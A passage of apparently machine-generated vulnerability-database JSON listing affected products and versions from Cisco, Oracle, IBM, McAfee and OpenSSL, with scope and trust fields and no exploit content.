"scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.11" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.14" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "powerkvm update", 